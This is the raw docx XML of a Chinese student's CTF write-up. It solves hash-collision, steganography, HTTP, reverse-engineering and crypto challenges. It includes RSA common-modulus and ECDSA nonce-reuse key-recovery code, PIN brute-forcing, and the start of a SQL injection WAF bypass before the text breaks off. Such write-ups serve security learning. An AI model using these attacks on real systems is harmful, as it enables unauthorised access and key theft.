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C78B7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23121677-范舒舰-CTF WP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F46889">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741D9C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Misc-Sign In</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F836C3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题目提供了代码：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可以看到要符合hash(YOU)==hash(TEACHER)即可输出FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8CB4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但是学号限制了输入，不能是老师学号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7EF22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构造学号使hash==60000573</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D6E2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print(2**61 - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04B1E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print(hash(2305843009273694524))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE049A8">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1409700" cy="2667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05AC4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将teacher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2305843009273694524</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2输入系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564ED102">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3848100" cy="14478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DA9CB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得到flag{cu5t0m_h45h_15_n0t_53cur3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62298D46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6529A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Misc-Things Behind the Picture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA91D7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直接将文件拖入StegSolve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09273B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FileFormat没有有用信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB513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查看plane 0最上层有一些奇怪条纹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213797CA">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="232410"/>
            <wp:effectExtent l="0" t="0" r="4445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0F8059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使用Data Extract预览plane 0的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB435A9">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1543050" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="635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E30DA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发现PK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C93EE9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直接输出.zip尝试解压，里面文件格式是.word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11116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将word文档里的所有文字替换成一个格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD44E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得到错误flag{this_is_really_a_fake_flag}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C9EF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正确flag藏在/docProps/app.xml里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329F91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flag{h1dd3n_1n_d0cx_m3t4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DBFB2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313F9F8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Misc-Where is He</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB4A9B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直接观察图片正前方是地铁轨道，右侧有一家全家，边上有云肥地产</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE6A37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748FEE7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web-HTTP Stamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D1B9E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直接运行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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="7D0C7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1B86724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GET / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F91810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Host: example.com\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B6CDB2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得到200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41219C5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7464AD4D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访问forbidden但是获得404 Not Found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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="7A365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0FEA759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GET /forbidden HTTP/1.1\r\nHost: example.com\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4397593D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2235E0B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构造405 Not Allowed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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="29D9A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222" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18479E9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 xml:space="preserve">PUT / HTTP/1.1\r\nHost: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>example</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>.com\r\nContent-Length: 0\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32EFDD48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB68AC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构造400 Bad Request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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="52598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5F95E3E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GET / HTTP/1.1\r\nHost \r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34967A55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3996C9A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重复尝试200了50次但是无法获得429 Too Many Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AEDA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BF1D3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请求部分内容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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="22A2C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</w:tcPr>
          <w:p w14:paraId="6138744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GET / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8F353D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Host: example.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="035E508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Range: bytes=0-10\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="033A61FB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获得206 Partial Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22E3C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D6BE7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使用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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="25AA6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02ED57F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GET / HTTP/2\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683D335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Host: example.com\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2056BBF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得到505 HTTP Version Not Supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8234A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1568534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使用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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="1C87A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02C2C174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PUT / HTTP/1.1\r\nHost: example.com\r\nContent-Length:100000000\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="385AD4F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得到413 Request Entity Too Large</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE91479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8F114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使用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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="33148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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05221D71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GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>...此处省略10000个a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C4387B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得到414 Request-URI Too Large</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65000BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2C846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使用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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="58A9F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753EEA1D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GET / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC7835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Host: example.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AB395F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Range: bytes=99999999-\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09DA52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得到416 Requested Range Not Satisfiable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCE09FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686C514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构造417返回了100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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="25387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34E6329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GET / HTTP/1.1\r\nHost: example.com\r\nExpect: 100-continue\r\n\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64A78050">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188B6B38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web-HTTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD3F5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听说HTTP有很多种请求方法？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F8C95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那就从请求办法看起</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055A6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GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH, TRACE, CONNECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B6356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使用burpsuite拦截请求，把请求办法一个个改成上文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C568498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当请求为POST的时候得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B61C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flag{d1ff3r3nt_http_m3th0d5_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFD2D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由于HEAD和OPTIONS不输出任何内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE3F1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直接拦截请求的相应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576BD2E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在PUT相应中找到藏起来的密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F841E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2933700" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="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522B3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h4v3_d1ff3r3nt_r35p0n535}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C932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合并得为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E77A28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flag{d1ff3r3nt_http_m3th0d5_h4v3_d1ff3r3nt_r35p0n535}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2A020">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1428E383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reverse-EzReverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CBA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确实比较简单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED9CA6F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放入IDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17722BC2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核心代码：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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="4531B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01DE6621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for (i = 0; i &lt;= 35; ++i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA0D5B5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s[i] = v5[i] ^ 0xAA;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AEDE944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590A6D4E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if (!memcmp(s, &amp;unk_4100, 0x24u)) // 0x24 == 36字节</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC20C31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puts("Congratulations!");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61960289">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BF5A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直接构造reverse代码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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="487B9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697A2EC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data = [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF5B4C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 xml:space="preserve">    0xCC, 0xC6, 0xCB, 0xCD, 0xD1, 0xDD, 0x99, 0x9B,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506AFA42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 xml:space="preserve">    0xC9, 0x9A, 0xC7, 0x99, 0xF5, 0xDE, 0x9A, 0xF5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A6C57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 xml:space="preserve">    0xDE, 0xC2, 0x99, 0xF5, 0xDD, 0x9A, 0xD8, 0x9B,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E2DDAFD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 xml:space="preserve">    0xCE, 0xF5, 0x9A, 0xCC, 0xF5, 0xC8, 0x9B, 0xC4,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FBE849F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 xml:space="preserve">    0x9F, 0x99, 0xC9, 0xD7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525421E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]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58C9FDB7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6052722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flag_bytes = [b ^ 0xAA for b in data]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BCCBB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flag = ''.join(map(chr, flag_bytes))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69428C12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49D17FE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print(flag)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="644C3825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D3F44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flag{w31c0m3_t0_th3_w0r1d_0f_b1n53c}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42386AB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2770F922">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Crypto-共模</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A7FE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直接使用之前写的共模代码，输入值输出flag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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="55204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3ECB6975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from Crypto.Util.number import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542D3665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from math import gcd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8C27A0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45E1058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 = 2270807881588501...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B710C30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e1 = 11187289</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017CABDB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e2 = 9647291</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF39E1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c1 = 17134...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710E7F0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c2 = 703308858653...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFEAE39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assert gcd(e1, e2) == 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58328F3F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def extended_gcd(a, b):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0706CA46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if b == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66E3E2BA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return (1, 0, a)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76BDF0FB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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74337C4F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x1, y1, d = extended_gcd(b, a % b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B39A3B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x, y = y1, x1 - (a // b) * y1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45513E83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return (x, y, d)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C1174A1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599385B8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s1, s2, _ = extended_gcd(e1, e2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6096FD76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if s1 &lt; 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08608D2B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c1 = inverse(c1, n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E29838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s1 = -s1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6024848B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if s2 &lt; 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3B4612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c2 = inverse(c2, n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76766AD6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s2 = -s2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72408E0D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 = pow(c1, s1, n) * pow(c2, s2, n) % n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B78CC1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4D117B0A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print(long_to_bytes(m).decode())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F01F355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673ECB56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Crypto-重复的命运</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D68EE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同上题一样简单，代码过长不在此完整列出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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="316A6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09105576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def hash_message(msg):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11858207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return int.from_bytes(sha256(msg).digest(), 'big')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD408C1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762327D2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z1 = hash_message(msg1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12ADA7DD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z2 = hash_message(msg2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF8946B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0F7E969B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# Calculate the private key d using the nonce reuse vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3493DD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def recover_private_key(z1, z2, s1, s2, n):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B383D2D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numerator = (z1 - z2) % n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="578BAF97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denominator = (s1 - s2) % n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4BE0D3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inv_denominator = pow(denominator, -1, n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72781D96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d = (numerator * inv_denominator) % n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE655C6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return d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5933E801">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EF13B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web-So Many Buttons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B5CC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使用burpsuite抓包获得/static/script.min.js路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514CADE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直接打开路径获得</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14383BB6">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="718820"/>
            <wp:effectExtent l="0" t="0" r="12065" b="508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1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715EA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得到是第225个按钮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC7FA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点击按钮发送POST请求，但是说要pin码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60AD7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抓不到pin码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF49E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发现Content-Length: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5202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PIN: 0001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1591B57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可以通过PIN检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7CAC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于是爆破9999次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5179D"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3613150" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="6350" b="50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13150" cy="217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2A33E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flag{y0u_h4v3_tr13d_v3ry_h4rd_4nd_h3r3_15_y0ur_r3w0rd~}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0612B985">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA8435A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689FD641">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web-Custom WAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C228D4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直接在用户名处注入，使用了复写及大小写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522"/>
      </w:tblGrid>
      <w:tr w14:paraId="6DF43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7E8273D2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' a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
